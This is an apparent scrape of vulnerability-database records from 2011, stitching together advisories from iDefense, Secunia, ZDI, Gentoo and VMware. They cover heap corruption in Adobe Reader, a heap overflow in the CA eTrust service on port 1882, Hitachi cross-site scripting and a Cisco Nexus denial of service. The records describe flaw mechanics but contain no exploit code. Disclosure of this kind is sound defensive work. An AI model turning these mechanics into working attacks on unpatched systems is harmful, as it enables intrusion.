Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. Adobe Reader and Acrobat Contains a vulnerability that allows arbitrary code execution. This vulnerability CVE-2011-0596 , CVE-2011-0598 and CVE-2011-0599 Is a different vulnerability.A third party may execute arbitrary code through the image.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. BACKGROUND
Adobe Reader/Acrobat is a Portable Document Format Viewer (PDF). For
more information, see the vendor's site found at the following link.
http://www.adobe.com/products/reader/
II.
JPEG2000 (JP2K) is an image file format similar to JPEG. In addition to
JPEG markers, JP2K files also provide "boxes" that define different
image properties. Several different JP2K record types are involved in the
vulnerability. It is possible to increment a buffer index beyond the
allocated data, and store pointers to file data at that location. This
can result in the corruption of heap structures and application data,
which leads to the execution of arbitrary code.
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the web page or opening the
file. Since PDF files can be embedded into web pages and parsed without
interaction by default, this vulnerability can be exploited as a
typical browser vulnerability. To exploit this vulnerability, a
targeted user must load a malicious webpage created by an attacker. An
attacker typically accomplishes this via social engineering or
injecting content into compromised, trusted sites. After the user
visits the malicious web page, no further user interaction is needed.
IV. A full list of vulnerable
Adobe products can be found in Adobe Security Bulletin APSB11-03.
V. WORKAROUND
Disabling the web view mode of Adobe Reader will prevent exploitation
through the browser.
VI. VENDOR RESPONSE
Adobe has addressed this issue with an update. Further details and
patches can be found at the following URL.
http://www.adobe.com/support/security/bulletins/apsb11-03.html
VII. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
11/17/2010 Initial Vendor Notification
11/17/2010 Initial Vendor Reply
02/08/2011 Coordinated Public Disclosure
IX.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2011 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0158 | CVE-2011-0758 | CA ETrust Secure Content Manager and CA Gateway Securit of eCS In the component Service operation interruption (DoS) Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
CA Secure Content Manager Common Services Transport Vulnerability
SECUNIA ADVISORY ID:
SA43200
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43200/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
RELEASE DATE:
2011-02-10
DISCUSS ADVISORY:
http://secunia.com/advisories/43200/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43200/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in CA Secure Content Manager, which
can be exploited by malicious people to compromise a vulnerable
system.
The vulnerability is caused due to missing input validation in the
eTrust Common Services Transport (ECSQdmn.exe) service when parsing
requests and can be exploited to cause a heap-based buffer overflow
via a specially crafted request sent to port 1882.
* CA Gateway Security version 8.1.
SOLUTION:
Restrict access to the affected service.
PROVIDED AND/OR DISCOVERED BY:
Sebastian Apelt via ZDI.
ORIGINAL ADVISORY:
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-059/
CA:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-059
February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca
-- CVE ID:
CVE-2011-0758
-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors:
CA
-- Affected Products:
CA eTrust Secure Content Manager
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability.
-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2011-02-07 - Public release of advisory
-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.apelt@siberas.de)
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0385 | No CVE | Hitachi Tuning Manager Unknown Cross-Site Scripting Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Hitachi Tuning Manager is an automated, intelligent and path-aware storage resource management software that monitors, analyzes and audits the performance of storage network resources from applications to storage devices. Hitachi Tuning Manager has multiple input validation issues, and remote attackers can exploit vulnerabilities for cross-site scripting attacks to obtain sensitive information or hijack target user sessions.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Hitachi Tuning Manager versions 6.0.0 through 6.4.0-01 and 7.0.0 are vulnerable. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi Tuning Manager Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID:
SA43209
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43209/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
RELEASE DATE:
2011-02-08
DISCUSS ADVISORY:
http://secunia.com/advisories/43209/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43209/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Hitachi Tuning Manager, which
can be exploited by malicious people to conduct cross-site scripting
attacks.
Certain unspecified input is not properly sanitised before being
returned to the user.
The vulnerability is reported in versions 6.0.0 through 6.4.0-01 and
7.0.0 running on Windows and Solaris.
SOLUTION:
Update to version 6.4.0-02 or 7.0.0-01.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-002:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-002/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0213 | CVE-2011-0355 | Cisco Nexus 1000V Virtual Ethernet Module Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Nexus 1000V Virtual Ethernet Module (VEM) 4.0(4) SV1(1) through SV1(3b), as used in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, does not properly handle dropped packets, which allows guest OS users to cause a denial of service (ESX or ESXi host OS crash) by sending an 802.1Q tagged packet over an access vEthernet port, aka Cisco Bug ID CSCtj17451. The Cisco Nexus 1000V VEM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the affected application to crash, resulting in a denial-of-service condition.
The following Cisco products are vulnerable:
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3b)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3a)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(2)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(1)
The following VMware products are vulnerable:
ESXi 4.1
ESXi 4.0
ESX 4.1
ESX 4.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2011-0002
Synopsis: Cisco Nexus 1000V VEM updates address denial of
service in VMware ESX/ESXi
Issue date: 2011-02-07
Updated on: 2011-02-07 (initial release of advisory)
CVE numbers: CVE-2011-0355
- ------------------------------------------------------------------------
1. Summary
Updated versions of the Cisco Nexus 1000V virtual switch address a
denial
of service in VMware ESX/ESXi.
2. Problem Description
a. This switch can be added to ESX and ESXi
where it replaces the VMware virtual switch and runs as part of the
ESX and ESXi kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-0355 to the issue.
VMware customers are only affected by this vulnerability if they
have chosen to deploy the Cisco Nexus 1000V virtual switch as a
replacement for the VMware vNetwork Standard Switch or the VMware
vNetwork Distributed Switch.
VMware has confirmed that the VMware vNetwork Standard Switch and
the VMware vNetwork Distributed Switch are not affected by the
vulnerability.
The issue is documented by Cisco in Cisco bug ID CSCtj17451 (see
section 5 for a link).
4. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0355
Cisco bug ID CSCtj17451 (registered Cisco customers only)
http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fe
tchBugDetails&bugId=CSCtj17451
- ------------------------------------------------------------------------
6.
- -----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2011 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFNUNTIS2KysvBH1xkRAk1hAJ9iH1j58lM5KrwVaRYccSN3rWaw/wCePyLP
FHYGA7W1DEcKcOFWj7GkuHE=
=srWD
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Cisco Nexus 1000V Virtual Switch 802.1Q Tagged Packet Denial of
Service
SECUNIA ADVISORY ID:
SA43084
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43084/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43084/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43084/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
